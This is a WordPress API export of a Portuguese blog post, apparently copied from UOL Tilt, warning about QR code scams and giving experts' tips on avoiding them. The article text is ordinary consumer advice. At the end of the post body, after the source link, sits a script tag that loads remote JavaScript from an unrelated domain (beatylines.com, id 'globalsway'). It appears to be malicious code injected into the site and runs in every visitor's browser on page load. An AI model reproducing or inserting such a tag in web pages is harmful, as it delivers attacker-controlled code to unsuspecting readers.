{"id":408,"date":"1969-12-31T21:00:00","date_gmt":"1970-01-01T00:00:00","guid":{"rendered":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/por-que-voce-nao-deve-sair-escaneando-qualquer-qr-code-por-ai\/"},"modified":"1969-12-31T21:00:00","modified_gmt":"1970-01-01T00:00:00","slug":"por-que-voce-nao-deve-sair-escaneando-qualquer-qr-code-por-ai","status":"publish","type":"post","link":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/por-que-voce-nao-deve-sair-escaneando-qualquer-qr-code-por-ai\/","title":{"rendered":"Por que voc\u00ea n\u00e3o deve sair escaneando qualquer QR code por a\u00ed"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p dir=\"ltr\">Com mais de 25 anos de &#8220;carreira&#8221;, o QR code se tornou mais presente na vida dos brasileiros nos \u00faltimos meses. Nas telas de TVs, nos card\u00e1pios digitais, no Pix: l\u00e1 est\u00e1 o quadradinho escane\u00e1vel.<\/p>\n<p dir=\"ltr\">Mas a ferramenta tamb\u00e9m apresenta seus riscos: tamb\u00e9m cresceram os <a href=\"https:\/\/www.uol.com.br\/tilt\/hacker\/\">ataques hackers<\/a> baseados nesse recurso.<\/p>\n<p dir=\"ltr\">As a\u00e7\u00f5es mais comuns s\u00e3o de direcionamento para outras p\u00e1ginas (ou URLs), que podem aplicar <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2020\/11\/19\/golpe-phishing-confira-o-que-e-como-se-proteger-e-como-denunciar.htm\">golpes de phishing<\/a> (para roubar dados pessoais ou dinheiro) ou instalar um malware (softwares maliciosos) no dispositivo da v\u00edtima.<\/p>\n<p dir=\"ltr\">&#8220;Isso t\u00eam maior probabilidade acontecer em c\u00f3digos QR impressos, j\u00e1 que, para adulterar um QR digital, seria necess\u00e1rio comprometer a estrutura de cria\u00e7\u00e3o do QR, algo muito mais complexo&#8221;, afirma Daniel Cunha Barbosa, especialista em seguran\u00e7a da informa\u00e7\u00e3o da Eset.<\/p>\n<p dir=\"ltr\">Os golpistas podem, por exemplo, cobrir o c\u00f3digo QR original de um restaurante ou loja com um adesivo contendo o QR malicioso. Ou at\u00e9 substituir toda a p\u00e1gina (uma folha do card\u00e1pio, um folheto de propaganda) por outra nova, com o quadradinho errado.<\/p>\n<p dir=\"ltr\">Al\u00e9m disso, os criminosos t\u00eam reciclado um golpe antigo: o das <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2020\/05\/26\/golpe-do-boleto-aprenda-de-vez-como-nao-pagar-contas-falsas.htm\">contas e faturas falsas<\/a>. A Kaspersky identificou a nova vers\u00e3o no come\u00e7o deste ano, com o uso de QR code do Pix.<\/p>\n<p dir=\"ltr\">O boleto imita o visual de uma conta original (de telefonia, por exemplo). O endere\u00e7o de email tamb\u00e9m \u00e9 muito similar ao leg\u00edtimo, na tentativa de passar despercebido. Normalmente, h\u00e1 uma oferta de desconto na quita\u00e7\u00e3o dos d\u00e9bitos, para tornar a transa\u00e7\u00e3o ainda mais sedutora.<\/p>\n<p dir=\"ltr\">&#8220;A v\u00edtima ent\u00e3o abre seu aplicativo de banco, entra na op\u00e7\u00e3o Pix, escaneia o QR Code do boleto falso e confirma o pagamento&#8221;, afirma F\u00e1bio Assolini, analista s\u00eanior de seguran\u00e7a da Kaspersky no Brasil.<\/p>\n<h2>Como se proteger?<\/h2>\n<p dir=\"ltr\">Especialistas recomendam algumas pr\u00e1ticas preventivas e muita aten\u00e7\u00e3o diante de situa\u00e7\u00f5es em que \u00e9 preciso escanear o quadradinho. Em casos que requerem pagamentos, o cuidado tem que ser redobrado.<\/p>\n<p dir=\"ltr\">&#8220;\u00c9 importante prestar aten\u00e7\u00e3o ao link exibido quando o QR code \u00e9 identificado pela c\u00e2mera. Por exemplo, se o URL estiver encurtado, \u00e9 um sinal de alerta, porque, com este tipo de c\u00f3digo, n\u00e3o h\u00e1 motivo para o encurtamento&#8221;, diz Assolini. Nesse caso, a vers\u00e3o &#8220;encurtada&#8221; serve para esconder o link real, que pode revelar o golpe.<\/p>\n<p dir=\"ltr\">Ele acrescenta tamb\u00e9m que as pessoas n\u00e3o devem escanear QRs de fontes suspeitas, encontradas nas ruas ou em locais que n\u00e3o apresentam nenhuma garantia.<\/p>\n<p dir=\"ltr\">&#8220;Altera\u00e7\u00f5es maliciosas normalmente n\u00e3o s\u00e3o t\u00e3o bem feitas quanto a original. Desconfie de qualquer mudan\u00e7a de padr\u00e3o ou de qualidade no material que lhe for oferecido&#8221;, complementa Barbosa, da Eset.<\/p>\n<p dir=\"ltr\">Igor Marques Gama, especialista em ciberseguran\u00e7a da ISH Tecnologia, diz que o usu\u00e1rio precisa ter aten\u00e7\u00e3o tamb\u00e9m em rela\u00e7\u00e3o \u00e0s a\u00e7\u00f5es realizadas ap\u00f3s a leitura do c\u00f3digo. Por exemplo: onde ele clica e o que ele autoriza. N\u00e3o faz sentido, por exemplo, o QR code do card\u00e1pio de um restaurante pedir autoriza\u00e7\u00e3o para fazer instala\u00e7\u00f5es no celular das pessoas.<\/p>\n<p dir=\"ltr\">&#8220;Nos casos de transfer\u00eancias via Pix ou carteiras digitais, sempre confirme com quem enviou o QR code os dados pessoais, o banco ou carteira utilizada e o valor. Verifique se o QR code no momento do pagamento reflete os dados informados&#8221;, afirma.<\/p>\n<p dir=\"ltr\">Al\u00e9m dessas precau\u00e7\u00f5es, \u00e9 preciso adotar programas de prote\u00e7\u00e3o digital, os famosos &#8220;antiv\u00edrus&#8221;, no dispositivo m\u00f3vel. Eles podem detectar e impedir a execu\u00e7\u00e3o de c\u00f3digos maliciosos em tentativas de ataques.<\/p>\n<\/p><\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/04\/22\/qr-code-quais-os-riscos-e-formas-de-protecao.htm\">Source link <\/a><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Com mais de 25 anos de &#8220;carreira&#8221;, o QR code se tornou mais presente na vida dos brasileiros nos \u00faltimos meses. Nas telas de TVs, nos card\u00e1pios digitais, no Pix: l\u00e1 est\u00e1 o quadradinho escane\u00e1vel. Mas a ferramenta tamb\u00e9m apresenta seus riscos: tamb\u00e9m cresceram os ataques hackers baseados nesse recurso. As a\u00e7\u00f5es mais comuns s\u00e3o&#8230;<\/p>\n","protected":false},"author":1,"featured_media":409,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"categories":[1],"tags":[917,295,373,915,255,111,916,914,544],"class_list":["post-408","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sem-categoria","tag-ai","tag-code","tag-deve","tag-escaneando","tag-nao","tag-por","tag-qualquer","tag-sair","tag-voce"],"_links":{"self":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/408","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/comments?post=408"}],"version-history":[{"count":0,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/408\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media\/409"}],"wp:attachment":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media?parent=408"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/categories?post=408"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/tags?post=408"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}